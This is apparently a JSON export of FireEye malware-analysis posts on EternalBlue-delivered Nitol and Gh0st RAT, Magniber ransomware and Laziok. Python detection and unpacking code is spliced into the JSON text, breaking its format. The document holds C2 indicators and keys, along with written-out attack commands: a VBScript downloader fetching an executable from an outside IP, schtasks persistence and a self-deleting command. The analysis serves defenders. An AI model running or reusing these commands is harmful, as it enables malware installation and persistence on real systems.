registrant for the sekielec.co[.]kr GongDa landing page domain, \u201crhhan AT sekihe.co[.]kr\u201d, also registered a number of other domains that have been observed as GongDa landing pages.\n\n##### **CONCLUSION**\n\nWith a name reminiscent of a creature straight out of [Monster Island](<https://en.wikipedia.org/wiki/Monsterland_and_Monster_Island>), GongDa may not be the new kid on the block; however, as demonstrated, it is still active and capable of wreaking havoc. 
Network defenders in the APAC region should be aware of this EK and take steps to ensure this \u201cmonster\u201d never enters their network.\n\n##### **ACKNOWLEDGEMENTS**\n\nThe authors and FireEye Labs would like to thank Dan Perez for his contribution to this blog.\n", "cvss3": {}, "published": "2016-03-18T12:30:00", "type": "fireeye", "title": "GongDa vs. Korean News", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332"], "modified": "2016-03-18T12:30:00", "id": "FIREEYE:5D24D2858B8BB9D354FB42C4E22B5DD7", "href": "https://www.fireeye.com/blog/threat-research/2016/03/gongda_vs_koreanne.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-06-28T01:17:12", "description": "The \u201cEternalBlue\u201d exploit ([MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) was initially used by WannaCry ransomware and Adylkuzz cryptocurrency miner. 
Now more threat actors are leveraging the vulnerability in [Microsoft Server Message Block (SMB) protocol](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>) \u2013 this time to distribute Backdoor.Nitol and Trojan Gh0st RAT.\n\nFireEye Dynamic Threat Intelligence (DTI) has historically observed similar payloads delivered via exploitation of CVE-2014-6332 vulnerability as well as in some email spam campaigns using [powershell commands](<https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html>). Specifically, Backdoor.Nitol has also been linked to campaigns involving a remote code execution vulnerability using the ADODB.Stream ActiveX Object that affects older versions of Internet Explorer. Both payloads have previously been involved in targeted [cyber-attacks against the aerospace and defense industry](<https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/ib-aerospace.pdf>).\n\nWe observed lab machines vulnerable to SMB exploit were attacked by a threat actor using the EternalBlue exploit to gain shell access to the machine.\n\nFigure 1 shows an EternalBlue exploitation attempt.\n\n\n\nFigure 1. Network traffic showing EternalBlue attack attempt\n\nThe initial exploit technique used at the [SMB level](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>) is similar to what we have been seen in [WannaCry campaigns](<https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html>); however, once a machine is successfully infected, this particular attack opens a shell to write instructions into a VBScript file and then executes it to fetch the payload on another server.\n\nWe have observed the same EternalBlue and VBScript combination used to distribute Gh0st RAT in Singapore, as well as Backdoor.Nitol being delivered in the South Asia region.\n\n\n\nFigure 2. 
VBScript instructions in \u20181.vbs\u2019\n\nThe full VBScript instructions can be seen in Figure 2. The attacker echoes instructions into a new \u20181.vbs\u2019 file to be executed later. These instructions fetch the payload \u2018taskmgr.exe\u2019 from another server with a synchronous XMLHTTP request (the call's async argument is set to \u20180\u2019). The script then creates an ADODB.Stream ActiveX object, which reads the file returned by the server and writes the binary data into a stream. Mode \u20183\u2019 opens the stream for read/write access, while Type \u20181\u2019 marks the stream contents as binary data. Thereafter, it saves the binary stream to a location under \u201cc:/\u201d with SaveToFile option \u20182\u2019, which overwrites any file of the same name at that location.\n\nLater, we see \u20181.vbs\u2019 executed through the command-line version of the Windows Script Host (cscript.exe), after which the .vbs file is deleted. Once the executable is fetched and saved, the attacker uses the shell to launch the backdoor from the saved location.\n\nFigure 3 shows Backdoor.Nitol being downloaded and infecting the machine.\n\nFigure 3. Network traffic showing Backdoor.Nitol download\n\nThe command and control (C2) server for the Backdoor.Nitol sample is hackqz.f3322[.]org (120.209.40[.]157). See Figure 4.\n\nFigure 4. Backdoor.Nitol C2 communication\n\nThe other malware that we\u2019ve observed being deployed in this manner is Gh0st RAT. The observed dropper downloads the Gh0st RAT binary from beiyeye.401hk[.]com (Figure 5).\n\nFigure 5. Gh0st RAT C2 communication\n\nThe first five bytes of the Gh0st RAT traffic header identify the Gh0st variant in use. Historically we have seen wide-spread usage of variants employing the \u2018**cb1st**\u2019 magic header against the Education, Energy/Utilities, Manufacturing, Services/Consulting, and Telecom industries. 
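The echo-and-execute sequence described above is easy to reconstruct from a captured shell session, and doing so turns a screenshot into indicators. The following Python is an added example, not code from the FireEye post: it reassembles a script that was built line by line with `echo ... >> file` redirects, then extracts the fields a responder cares about (the fetch URL, whether the XMLHTTP call is synchronous, the ADODB.Stream Mode and Type, and the SaveToFile path and overwrite option) and checks whether the script was run by the Windows Script Host and deleted afterwards. The shell transcript it parses is constructed to match the page's description of Figure 2 (taskmgr.exe fetched from 121.201.9[.]204:45988 and written under c:/); the actual script is not reproduced on the page, so the variable names and line layout are assumptions.

```python
import re

# Constructed sample shell transcript (not the actual Figure 2 capture), modelled on
# the page's description: the attacker echoes a VBScript downloader into 1.vbs,
# runs it with cscript, deletes it, then launches the fetched binary.
SAMPLE_SHELL_LOG = r'''
echo Set h = CreateObject("Microsoft.XMLHTTP") > 1.vbs
echo h.Open "GET", "http://121.201.9.204:45988/taskmgr.exe", 0 >> 1.vbs
echo h.Send >> 1.vbs
echo Set s = CreateObject("ADODB.Stream") >> 1.vbs
echo s.Mode = 3 >> 1.vbs
echo s.Type = 1 >> 1.vbs
echo s.Open >> 1.vbs
echo s.Write h.ResponseBody >> 1.vbs
echo s.SaveToFile "c:/taskmgr.exe", 2 >> 1.vbs
cscript 1.vbs
del 1.vbs
c:\taskmgr.exe
'''

# echo <body> >  target   (truncate)   /   echo <body> >> target   (append)
ECHO_RE = re.compile(r'^echo\s+(.*?)\s*(>>|>)\s*(\S+)\s*$')

# ADODB.Stream constants the page explains: Mode 3 = read/write, Type 1 = binary,
# SaveToFile option 2 = create-or-overwrite.
ADODB_MODES = {1: "adModeRead", 2: "adModeWrite", 3: "adModeReadWrite"}
ADODB_TYPES = {1: "adTypeBinary", 2: "adTypeText"}
SAVE_OPTS = {1: "adSaveCreateNotExist", 2: "adSaveCreateOverWrite"}


def reassemble_echoed_scripts(log: str) -> dict:
    """Rebuild every file that was written with echo redirects, in order."""
    scripts = {}
    for line in log.splitlines():
        m = ECHO_RE.match(line.strip())
        if not m:
            continue
        body, op, target = m.groups()
        if op == ">":                      # a single '>' starts the file over
            scripts[target] = []
        scripts.setdefault(target, []).append(body)
    return {name: "\n".join(lines) for name, lines in scripts.items()}


def analyze_downloader(script: str) -> dict:
    """Pull the download and write-to-disk parameters out of an XMLHTTP + ADODB.Stream script."""
    f = {"url": None, "synchronous": None, "mode": None, "type": None,
         "save_path": None, "save_option": None}
    m = re.search(r'\.Open\s+"GET"\s*,\s*"([^"]+)"\s*,\s*(\w+)', script, re.I)
    if m:
        f["url"] = m.group(1)
        f["synchronous"] = m.group(2).lower() in ("0", "false")   # async argument
    m = re.search(r'\.Mode\s*=\s*(\d)', script, re.I)
    if m:
        f["mode"] = ADODB_MODES.get(int(m.group(1)), "unknown")
    m = re.search(r'\.Type\s*=\s*(\d)', script, re.I)
    if m:
        f["type"] = ADODB_TYPES.get(int(m.group(1)), "unknown")
    m = re.search(r'\.SaveToFile\s+"([^"]+)"\s*,\s*(\d)', script, re.I)
    if m:
        f["save_path"] = m.group(1)
        f["save_option"] = SAVE_OPTS.get(int(m.group(2)), "unknown")
    f["drops_binary"] = bool(f["url"] and f["save_path"] and f["type"] == "adTypeBinary")
    return f


def triage_shell_log(log: str) -> list:
    """One finding per reassembled script, plus whether WSH ran it and the file was removed."""
    findings = []
    for name, script in reassemble_echoed_scripts(log).items():
        f = analyze_downloader(script)
        f["script"] = name
        f["executed_by_wsh"] = re.search(r'\b[cw]script(?:\.exe)?\s+' + re.escape(name), log, re.I) is not None
        f["script_deleted"] = re.search(r'\bdel\s+' + re.escape(name), log, re.I) is not None
        findings.append(f)
    return findings


if __name__ == "__main__":
    for finding in triage_shell_log(SAMPLE_SHELL_LOG):
        print(finding)
```

The same three regexes also work over EDR process-creation events, where each `echo` appears as a separate `cmd.exe` command line; feed the command lines in as the transcript.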
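Because the variant is announced in the first five bytes, Gh0st traffic can be fingerprinted on the wire without decoding the command. The Python below is an added example, not FireEye's detection logic; it assumes the widely documented Gh0st 3.x framing (a 5-byte magic, then two little-endian 32-bit lengths giving the total packet size and the uncompressed payload size, then a zlib-compressed body), which variants such as cb1st keep while swapping the magic. The packets it parses are constructed inside the block, and the command-byte values in them are arbitrary.

```python
import struct
import zlib

# 5-byte magic values seen in Gh0st RAT traffic: "Gh0st" is the original,
# "cb1st" the variant discussed in the post. Extend the table as variants appear.
KNOWN_MAGIC = {b"Gh0st": "Gh0st (original)", b"cb1st": "cb1st variant"}
HEADER_LEN = 13   # magic(5) + total_len(4) + uncompressed_len(4), little-endian


def build_packet(magic: bytes, payload: bytes) -> bytes:
    """Frame a payload the way Gh0st does; used here only to construct sample traffic."""
    body = zlib.compress(payload)
    return magic + struct.pack("<II", HEADER_LEN + len(body), len(payload)) + body


def parse_packet(data: bytes) -> dict:
    """Validate the framing of one packet and inflate its body.

    Raises ValueError (or zlib.error) when the length fields or the zlib body are
    inconsistent, so a detector can tell real Gh0st framing from a chance 5-byte match."""
    if len(data) < HEADER_LEN:
        raise ValueError("truncated header")
    magic = data[:5]
    total_len, orig_len = struct.unpack("<II", data[5:HEADER_LEN])
    if total_len < HEADER_LEN or total_len > len(data):
        raise ValueError("total length field inconsistent with packet size")
    payload = zlib.decompress(data[HEADER_LEN:total_len])
    if len(payload) != orig_len:
        raise ValueError("uncompressed length field does not match body")
    return {
        "magic": magic,
        "variant": KNOWN_MAGIC.get(magic, "unknown magic"),
        "command": payload[0] if payload else None,   # first byte carries the command/token code
        "payload": payload,
        "consumed": total_len,
    }


def split_stream(data: bytes) -> list:
    """Walk a reassembled TCP stream and return every well-formed Gh0st packet in it."""
    packets, offset = [], 0
    while offset + HEADER_LEN <= len(data):
        try:
            pkt = parse_packet(data[offset:])
        except (ValueError, zlib.error):
            break                   # framing lost: stop rather than guess
        packets.append(pkt)
        offset += pkt["consumed"]
    return packets


def is_gh0st_stream(data: bytes) -> bool:
    """Cheap wire check: known magic, sane total length and a zlib CMF byte right after the header."""
    if len(data) < HEADER_LEN + 2 or data[:5] not in KNOWN_MAGIC:
        return False
    total_len, _ = struct.unpack("<II", data[5:HEADER_LEN])
    return total_len <= len(data) and data[HEADER_LEN] == 0x78


# Constructed sample: two cb1st-framed packets back to back, as a sensor would reassemble them.
SAMPLE_STREAM = (build_packet(b"cb1st", b"\x66" + b"A" * 200)
                 + build_packet(b"cb1st", b"\x01" + b"BEACON"))

if __name__ == "__main__":
    print(is_gh0st_stream(SAMPLE_STREAM))
    for p in split_stream(SAMPLE_STREAM):
        print(p["variant"], hex(p["command"]), len(p["payload"]))
```

`is_gh0st_stream` is what belongs in a fast path (an IDS content match on the magic plus the `0x78` zlib byte at offset 13 is equivalent); `split_stream` is the slower confirmation that both length fields and the compressed body agree, which a random five-byte collision will not pass.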
For more information on this and other widely used variants of Gh0st RAT, please review [_GH0ST in the Machine: GH0ST RAT Remains Active in Financial Services Sector_](<https://mysight.isightpartners.com/report/full/16-00006116>), available on our subscription MySight portal.\n\nThe Gh0st RAT sample observed in this attack, as well as other associated samples identified by FireEye, are all signed with a common digital certificate purporting to be from \u5317\u4eac\u7814\u521b\u8fbe\u79d1\u6280\u6709\u9650\u516c\u53f8 (Beijing Institute of Science and Technology Co., Ltd). Stolen or illegitimately purchased code signing certificates are increasingly used to lend legitimacy to malware. See the appendix for full details on the observed code signing certificate.\n\n##### **Conclusion**\n\nThe addition of the EternalBlue exploit to Metasploit has made it easy for threat actors to exploit these vulnerabilities. In the coming weeks and months, we expect to see more attackers leveraging them to spread infections with different payloads. 
It is critical that Microsoft Windows users patch their machines and update to the latest software versions as soon as possible.\n\n##### Acknowledgements\n\nFireEye Labs authors would like to thank Shahzad Ahmad and Kean Siong Tan for their contributions in this discovery.\n\nIOCs\n\nSHA256 \ncba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946 \n4f49e17b457ef202ab0be905691ef2b2d2b0a086a7caddd1e70dd45e5ed3b309\n\nDownloader\n\n121.201.9[.]204:45988 / taskmgr.exe (Nitol) \nbeiyeye.401hk[.]com:1541 / systemUpdate.exe (Gh0st)\n\nC2\n\nhackqz.f3322[.]org (Nitol) \n120.209.40[.]157:8880 (Nitol) \nbj6po.a1free9bird[.]com (Gh0st) \n \nCode-Signing Certificate\n\n\n", "edition": 2, "cvss3": {}, "published": "2017-06-02T09:00:00", "type": "fireeye", "title": "Threat actors leverage EternalBlue exploit to deliver non-WannaCry payloads", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332"], "modified": "2017-06-02T09:00:00", "id": "FIREEYE:1199DD4FBE70F58C3062B0B2270EAA03", "href": "https://www.fireeye.com/blog/threat-research/2017/05/threat-actors-leverage-eternalblue-exploit-to-deliver-non-wannacry-payloads.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:18:22", "description": "#### Introduction\n\nExploit kit (EK) use has been on the decline since late 2016; however, certain activity remains consistent. 
The Magnitude Exploit Kit is one such example that continues to affect users, particularly in the APAC region.\n\nIn Figure 1, which is based on FireEye Dynamic Threat Intelligence (DTI) reports shared in March 2017, we can see the regions affected by Magnitude EK activity during the last three months of 2016 and the first three months of 2017.\n\nFigure 1: Magnitude EK distribution as seen in March 2017\n\nThis trend continued until late September 2017, when we saw Magnitude EK focus primarily on the APAC region, with a large share targeting South Korea. Magnitude EK activity then fell off the radar until Oct. 15, 2017, when it came back and began focusing solely on South Korea. Previously it had been distributing Cerber ransomware, but Cerber distribution has declined (we have also seen a decline in Cerber being distributed via email) and it is now distributing ransomware known as Magniber.\n\n#### Infection\n\nThe first reappearance of Magnitude EK on Oct. 15 came as a malvertising redirection from the domain fastprofit[.]loan. The infection chain is shown in Figure 2.\n\nFigure 2: Infection chain\n\nThe Magnitude EK landing page exploited CVE-2016-0189, which was first reported by FireEye as being used in [Neutrino Exploit Kit](<https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html>) after it was patched. 
Figure 3 shows the landing page and CVE usage.\n\nFigure 3: Magnitude EK landing page\n\nAs seen previously with Magnitude EK, the payload is downloaded as a plain EXE (see Figure 4), and the domain infrastructure is hosted on a server reporting the following banner:\n\n\u201cApache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6\u201d\n\nFigure 4: Magnitude payload header and plain MZ response\n\n#### Payload\n\nIn the initial report [published by our colleagues at Trend Micro](<http://blog.trendmicro.com/trendlabs-security-intelligence/magnitude-exploit-kit-now-targeting-korea-with-magniber-ransomware/>), the ransomware being distributed is referred to as Magniber. These ransomware payloads only seem to target Korean systems, since they won\u2019t execute if the system language is not Korean.\n\nMagniber encrypts user data using AES-128. The sample used (dc2a2b84da359881b9df1ec31d03c715) for this analysis was pulled from our DTI system when the campaign was active. Of note, this sample differs from the hash shared publicly by Trend Micro, but the two exhibit the same behavior and share the infection vector, and both were distributed around the same time.\n\nThe malware contains a binary payload in its resource section that is RC4-encrypted in reverse: it unpacks the buffer from its end back to its start. The RC4 decryption keys are 30 bytes long and contain non-ASCII bytes. For the analyzed sample the key is:\n\n * dc2a2b84da359881b9df1ec31d03c715 RC4 key:\n * { 0x6b, 0xfe, 0xc4, 0x23, 0xac, 0x50, 0xd7, 0x91, 0xac, 0x06, 0xb0, 0xa6, 0x65, 0x89, 0x6a, 0xcc, 0x05, 0xba, 0xd7, 0x83, 0x04, 0x90, 0x2a, 0x93, 0x8d, 0x2d, 0x5c, 0xc7, 0xf7, 0x3f }\n\nThe malware calls _GetSystemDefaultUILanguage_, and if the system language is not Korean, it exits (the instructions can be seen in Figure 5). After unpacking in memory, the malware starts executing the unpacked payload.\n\nFigure 5: Language check targeted at Korea\n\nA mutex with the name \"ihsdj\" is created to prevent multiple executions. 
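The unpacking script the post refers to as Figure 9 is not reproduced in this copy, so the following Python is an added example, not FireEye's script, that implements the scheme as described: a standard RC4 keystream under the 30-byte key above, applied to the resource buffer from its last byte back to its first. That reading of "in reverse" (first keystream byte against the last buffer byte) is an assumption; if a sample does not yield an MZ header, try the forward direction before suspecting the key. The packed resource in the block is constructed by running a dummy PE stub through the same routine, since RC4 is symmetric, so the block runs without the sample.

```python
# Added example: reverse-RC4 unpacking as described for Magniber (not the Figure 9 script).

MAGNIBER_RC4_KEY = bytes([
    0x6b, 0xfe, 0xc4, 0x23, 0xac, 0x50, 0xd7, 0x91, 0xac, 0x06,
    0xb0, 0xa6, 0x65, 0x89, 0x6a, 0xcc, 0x05, 0xba, 0xd7, 0x83,
    0x04, 0x90, 0x2a, 0x93, 0x8d, 0x2d, 0x5c, 0xc7, 0xf7, 0x3f,
])  # key for sample dc2a2b84da359881b9df1ec31d03c715, as listed in the post


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Standard RC4: key scheduling (KSA), then `length` bytes of PRGA output."""
    S = list(range(256))
    j = 0
    for i in range(256):                        # KSA
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                     # PRGA
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4; encryption and decryption are the same XOR."""
    return bytes(b ^ k for b, k in zip(data, rc4_keystream(key, len(data))))


def rc4_reverse(key: bytes, data: bytes) -> bytes:
    """RC4 consumed against the buffer from its end to its start.

    Assumption: the first keystream byte is applied to the LAST byte of the
    buffer and the walk proceeds backwards, which is how we read "unpacking
    from the end of the buffer to its start". Symmetric, so it also packs."""
    return rc4(key, data[::-1])[::-1]


def unpack_resource(blob: bytes, key: bytes = MAGNIBER_RC4_KEY) -> bytes:
    """Unpack an RC4-reversed resource and check that a PE image came out."""
    image = rc4_reverse(key, blob)
    if image[:2] != b"MZ":
        raise ValueError("unpacked buffer does not start with MZ: wrong key or wrong direction")
    return image


# Constructed stand-in for the encrypted resource: a dummy PE stub (e_lfanew = 0x80,
# "PE\0\0" at that offset) packed with the same routine. Not bytes from the real sample.
DUMMY_PE = (b"MZ" + b"\x90" * 58 + (0x80).to_bytes(4, "little")
            + b"\x00" * 64 + b"PE\x00\x00" + b"\xcc" * 300)
PACKED_RESOURCE = rc4_reverse(MAGNIBER_RC4_KEY, DUMMY_PE)

if __name__ == "__main__":
    image = unpack_resource(PACKED_RESOURCE)
    print(image[:2], image[0x80:0x84], len(image))
```

To use it on the real sample, extract the resource bytes (for example with pefile) and pass them to `unpack_resource`; the MZ check is the only oracle needed, because a wrong key or direction produces uniformly random-looking output.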
The payload then generates a pseudorandom 19-character string seeded from the CPU clock via multiple _GetTickCount_ calls. The string is then used to create a file in the user\u2019s %TEMP% directory (e.g. \"xxxxxxxxxxxxxxxxxxx.ihsdj\"), which contains the IV (initialization vector) for the AES-128 encryption; a copy of the malware itself is also written there with the name \"ihsdj.exe\".\n\nNext, the malware constructs four URLs for callback. It uses the 19-character pseudorandom string it generated and the following domains to create the URLs:\n\n * bankme.date\n * jobsnot.services\n * carefit.agency\n * hotdisk.world\n\nTo evade sandbox systems, the malware checks whether it is running inside a VM and appends the result to the callback URL. It does this by executing CPUID instructions (shown in Figure 6) sandwiched between RDTSC reads; CPUID unconditionally causes a VM exit on hardware-virtualized guests, so the measured cycle count is far higher under a hypervisor than on bare metal.\n\nFigure 6: CPUID instruction to detect VM presence\n\nThe VM check is repeated several times to obtain the average execution time of CPUID, and if the average is greater than 1000, the system is considered a VM. If the malware concludes it is running in a VM, a \"1\" is appended to the end of the URL (see Figure 7); otherwise, \"0\" is appended. The format of the URL is as follows:\n\n * http://[19 character pseudorandom string].[callback domain]/new[0 or 1]\n\nExamples of this would be:\n\n * http://7o12813k90oggw10277.bankme[.]date/new1\n * http://4bg8l9095z0287fm1j5.bankme[.]date/new0\n\nFigure 7: Command and control communication\n\nIf the malware is executed a second time after encryption, the callback URL ends in \"end0\" or \"end1\" instead of \"new0\" or \"new1\". An example of this would be:\n\n * hxxp://j2a3y50mi0a487230v1.bankme[.]date/end1\n\nThe malware then starts to encrypt user files on the system, renaming them by adding a \".ihsdj\" extension to the end. 
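A proxy or DNS log carries enough to recognise these beacons: a 19-character alphanumeric label, one of the four callback domains, and a path of new or end followed by the VM flag. The Python below is an added example and not part of the FireEye post. It classifies URLs against that format and groups the hits by the 19-character tag, which Magniber reuses across all four domains and both phases, so one victim's first-run and post-encryption beacons tie together even when they go to different domains. The log lines it scans are constructed; their tags are copied from the examples above and the client addresses are made up.

```python
import re
from collections import defaultdict

MAGNIBER_C2_DOMAINS = ("bankme.date", "jobsnot.services", "carefit.agency", "hotdisk.world")

# http://<19 alphanumerics>.<callback domain>/(new|end)(0|1)
BEACON_RE = re.compile(
    r"^https?://(?P<tag>[a-z0-9]{19})\.(?P<domain>"
    + "|".join(re.escape(d) for d in MAGNIBER_C2_DOMAINS)
    + r")/(?P<phase>new|end)(?P<vm>[01])$",
    re.IGNORECASE,
)


def classify_url(url: str):
    """Return the beacon fields for a Magniber callback URL, or None for anything else."""
    m = BEACON_RE.match(url.strip())
    if not m:
        return None
    return {
        "tag": m.group("tag").lower(),
        "domain": m.group("domain").lower(),
        "phase": "first run" if m.group("phase").lower() == "new" else "post-encryption run",
        "vm_detected": m.group("vm") == "1",   # the malware's own sandbox verdict
    }


def scan_proxy_log(lines):
    """Parse 'timestamp client url' lines and group beacons per infected host.

    The tag is the pivot: the same 19-character string is built into every
    callback domain and into both the new* and end* requests."""
    by_tag = defaultdict(list)
    for line in lines:
        parts = line.split()
        if len(parts) < 3:
            continue
        ts, client, url = parts[0], parts[1], parts[2]
        beacon = classify_url(url)
        if beacon:
            beacon.update({"time": ts, "client": client})
            by_tag[beacon["tag"]].append(beacon)
    return dict(by_tag)


# Constructed sample log lines (format: timestamp client url).
SAMPLE_LOG = [
    "2017-10-16T09:12:01Z 10.1.2.3 http://7o12813k90oggw10277.bankme.date/new0",
    "2017-10-16T09:12:02Z 10.1.2.3 http://7o12813k90oggw10277.jobsnot.services/new0",
    "2017-10-16T09:12:03Z 10.1.2.3 http://www.example.com/index.html",
    "2017-10-16T09:40:11Z 10.1.2.3 http://7o12813k90oggw10277.carefit.agency/end0",
    "2017-10-16T09:41:55Z 10.9.9.9 http://4bg8l9095z0287fm1j5.hotdisk.world/new1",
    "2017-10-16T09:42:00Z 10.9.9.9 http://abcdefghijklmnopqrs.bankme.date/newx",
]

if __name__ == "__main__":
    for tag, beacons in scan_proxy_log(SAMPLE_LOG).items():
        print(tag, [(b["client"], b["domain"], b["phase"], b["vm_detected"]) for b in beacons])
```

A host whose tag shows up with an end0 or end1 request has already finished encrypting; a host seen only with new0 is the one worth isolating immediately. A new1 hit means the malware decided it was in a VM, which is also how a detonation sandbox will look to it.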
The AES-128 key and IV for the sample analyzed are listed:\n\n * IV: EP866p5M93wDS513\n * AES-128 key: S25943n9Gt099y4K\n\nA text file \"READ_ME_FOR_DECRYPT_xxxxxxxxxxxxxxxxxxx_.txt\" is created in the user\u2019s %TEMP% directory and shown to the user. The ransom message is shown in Figure 8.\n\nFigure 8: Ransom message for the infected user\n\nThe malware also adds scheduled tasks that run its copy from %TEMP% through the Program Compatibility Assistant (pcalua.exe, a signed Windows binary commonly abused to proxy execution) and that reopen the ransom note, as follows:\n\n * schtasks /create /SC MINUTE /MO 15 /tn ihsdj /TR \"pcalua.exe -a %TEMP%\\ihsdj.exe\"\n * schtasks /create /SC MINUTE /MO 15 /tn xxxxxxxxxxxxxxxxxxx /TR %TEMP%\\READ_ME_FOR_DECRYPT_xxxxxxxxxxxxxxxxxxx_.txt\n\nThe malware then issues a command to delete itself after exiting, using a local ping to delay the deletion until the process has terminated:\n\n * cmd /c ping localhost -n 3 > nul & del C:\\PATH\\MALWARE.EXE\n\nFigure 9 contains the Python code for unpacking the malware payload, which is encrypted using RC4 in reverse.\n\nFigure 9: Python script for unpacking malware payload\n\n#### Conclusion\n\nRansomware is a significant threat to enterprises. While the current threat landscape suggests a large portion of attacks are coming from emails, exploit kits continue to put users at risk \u2013 especially those running old software versions and not using ad blockers. Enterprises need to make sure their network nodes are fully patched.\n\nAll FireEye products detect the malware in our MVX engine. 
Additionally, [FireEye NX](<https://www.fireeye.com/products/nx-network-security-products.html>) blocks delivery at the infection point.\n\n#### IOCs\n\n##### Malware Sample Hash\n\n * dc2a2b84da359881b9df1ec31d03c715 (decryption key shared)\n\n##### Malvertiser Domains\n\n * fastprofit[.]loan\n * fastprofit[.]me\n\n##### EK Domain Examples\n\n * 3e37i982wb90j.fileice[.]services\n * a3co5a8iab2x24g90.helpraw[.]schule\n * 2i1f3aadm8k.putback[.]space\n\n##### Command and Control Domains\n\n * 3ee9fuop6ta4d6d60bt.bankme[.]date\n * 3ee9fuop6ta4d6d60bt.jobsnot[.]services\n * 3ee9fuop6ta4d6d60bt.carefit[.]agency\n * 3ee9fuop6ta4d6d60bt.hotdisk[.]world\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-10-19T16:06:00", "type": "fireeye", "title": "Magniber Ransomware Wants to Infect Only the Right People", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0189"], "modified": "2017-10-19T16:06:00", "id": "FIREEYE:BE50F5D8A44B5F476D7A63CB23072BEA", "href": "https://www.fireeye.com/blog/threat-research/2017/10/magniber-ransomware-infects-only-the-right-people.html", "cvss": {"score": 7.6, "vector": 
"AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-11-04T00:25:44", "description": "##### **Introduction**\n\nThrough our multi-flow detection capability, we recently identified malicious actors spreading Trojan.Laziok malware via Google Docs. We observed that the attackers managed to upload the payload to Google Docs in March 2016. During the brief time it was live, users accessing the malicious page from Internet Explorer (versions 3 to 11) would have become unwilling hosts for the infostealer payload without any security warning. After we alerted Google about its presence, they quickly cleaned it up and the original URL involved in propagation also went down.\n\n##### **The Payload**\n\nTrojan.Laziok reportedly serves as a reconnaissance tool that attackers use to collect information about systems they have compromised. It has been seen previously in a cyber espionage campaign targeting the energy sector, particularly in the Middle East[i]. In that campaign, the malware was spread using spam emails with malicious attachments exploiting the CVE-2012-0158 vulnerability.\n\nThe techniques used for delivery in this case involve exploiting users running versions of Internet Explorer that support VBScript.\n\n##### **Attack Delivery Point**\n\nThe attacker stored the first stage of the attack on the Polish domain hosting site cba[.]pl. As seen in Figure 1, the first stage initiates the attack by running obfuscated JavaScript from www.younglean.cba[.]pl/lean/.\n\nFigure 1. Obfuscated code shown in the response\n\nOnce decoded, the JavaScript unpacks and runs an exploit for CVE-2014-6332 through VBScript execution in Internet Explorer (versions 3 to 11). The memory corruption vulnerability in Windows Object Linking and Embedding (OLE) Automation is used to flip the VBScript engine\u2019s safe-mode flags, so the script runs with \u201cGodMode\u201d privileges outside the browser\u2019s normal restrictions. 
